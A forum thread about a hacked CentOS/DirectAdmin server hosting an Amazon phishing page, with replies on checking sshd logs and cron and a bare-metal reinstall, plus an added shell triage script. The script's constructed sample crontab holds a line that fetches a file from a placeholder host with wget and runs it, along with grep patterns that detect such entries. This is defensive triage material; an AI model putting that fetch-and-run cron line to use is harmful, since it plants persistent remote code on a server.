Hacked for Amazon phishing site. Need help

decafranky

Hi,

A CentOS 4.4 server running DirectAdmin has been hacked and is hosting a phishing site for Amazon.

The phishing URL is uploaded to /var/www/html/.gp/css/homepage.html/ref=topnav_ya_gw/102-9587475-5260134/exec.php?cmd=validate

It is created as user root:root (!!!).

Even remote ssh login is no longer possible (local login on the server is not a problem). When I log in remotely via ssh, after it asks for the password I get timeouts.

With webmin I can see the html files and delete them. But after a couple of hours they are uploaded again.

Need help.

And how can i fix the remote ssh login?

Franky

EDIT:
I run following services:
Apache 1.3.34
DirectAdmin 1.27.5
Exim 4.63
MySQL 4.1.11
Named 9.2.4
ProFTPd 1.2.10
sshd Running
vm-Pop3d 1.1.7f-DA-2
 
Use webmin command prompt to look for sshd errors.

grep sshd /var/log/messages

Once you know why it is erroring out you can work on correcting it.
 
Login DA CP as Admin
Use Log Viewer to see error message
Use File Editor to check the sshd_config file; maybe the login timeout was changed.
Edit/save the file, then restart sshd.

Try ssh to your server and check for all suspicious cron entries and running processes.

Sounds like you have webmin installed, so you may also use the command line via webmin.
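The checks suggested in the two replies above (sshd errors in /var/log/messages, suspicious cron entries, and the files that keep reappearing under the web root) written out as an added shell example; this is not code from the thread or from DirectAdmin. It assumes a POSIX sh with grep, find and mktemp, and the log lines, crontab and web-root files it scans are constructed samples written to a scratch directory, not data from the compromised server.

```shell
#!/bin/sh
# Added triage helpers (not from the thread or DirectAdmin). Assumes POSIX sh
# with grep, find and mktemp. Everything below the functions is constructed
# sample data, written to a scratch directory.

# sshd error/failure lines from a syslog-style file: the narrowed form of the
# `grep sshd /var/log/messages` suggested above.
sshd_errors() {
    grep 'sshd\[' "$1" | grep -iE 'error|fatal|refused|failed|timeout'
}

count_sshd_errors() {
    sshd_errors "$1" | wc -l | tr -d ' '
}

# Crontab lines (comments and blanks skipped) that run something from the web
# root, /tmp or /dev/shm, or fetch content at run time: the usual way a deleted
# phishing kit keeps coming back after a couple of hours.
suspicious_cron() {
    grep -vE '^[[:space:]]*(#|$)' "$1" | grep -E '/var/www|/tmp|/dev/shm|wget |curl '
}

count_suspicious_cron() {
    suspicious_cron "$1" | wc -l | tr -d ' '
}

# Files under DIR owned by OWNER and modified within the last DAYS days.
# On the real box this would be: recent_files /var/www/html 1 root
recent_files() {
    find "$1" -type f -user "$3" -mtime "-$2"
}

count_recent_files() {
    recent_files "$1" "$2" "$3" | wc -l | tr -d ' '
}

# --- constructed sample data (not from the compromised server) -------------
WORK=$(mktemp -d)
LOG="$WORK/messages"
CRON="$WORK/root.crontab"
WEBROOT="$WORK/html"

cat > "$LOG" <<'EOF'
Oct 12 10:01:02 srv sshd[2201]: Accepted password for franky from 203.0.113.5 port 50214 ssh2
Oct 12 10:05:44 srv sshd[2230]: error: Could not load host key: /etc/ssh/ssh_host_dsa_key
Oct 12 10:06:10 srv sshd[2235]: fatal: Timeout before authentication for 203.0.113.5
Oct 12 10:07:00 srv crond[2300]: (root) CMD (run-parts /etc/cron.hourly)
Oct 12 10:08:30 srv sshd[2240]: Failed password for invalid user admin from 198.51.100.9 port 4040 ssh2
EOF

cat > "$CRON" <<'EOF'
# m h dom mon dow command
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * /usr/bin/wget -q -O /tmp/.x http://PLACEHOLDER-HOST/x && sh /tmp/.x
5 0 * * * /var/www/html/.gp/update.sh
EOF

# A mock web root: an ordinary page plus a dropped file in a hidden directory.
mkdir -p "$WEBROOT/.gp/css"
: > "$WEBROOT/index.html"
: > "$WEBROOT/.gp/css/exec.php"

# The sample files belong to whoever runs this script, so look for that owner;
# on the real server the owner of interest is root.
ME=$(id -un)

echo "sshd error/failure lines: $(count_sshd_errors "$LOG")"
sshd_errors "$LOG"
echo "suspicious cron entries: $(count_suspicious_cron "$CRON")"
suspicious_cron "$CRON"
echo "files under $WEBROOT owned by $ME and touched in the last day: $(count_recent_files "$WEBROOT" 1 "$ME")"
recent_files "$WEBROOT" 1 "$ME"
```

Run it as-is to see the three checks against the sample data; on the real server point the functions at /var/log/messages, /var/spool/cron/root (and /etc/cron.d, /etc/cron.hourly) and /var/www/html with owner root. The scratch directory in $WORK is left in place so the sample files can be inspected afterwards.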
 
Anyone who is able to create files as root and disable ssh now owns your server.

It's been hacked and the only safe thing to do is a bare metal reinstall.

Jeff
 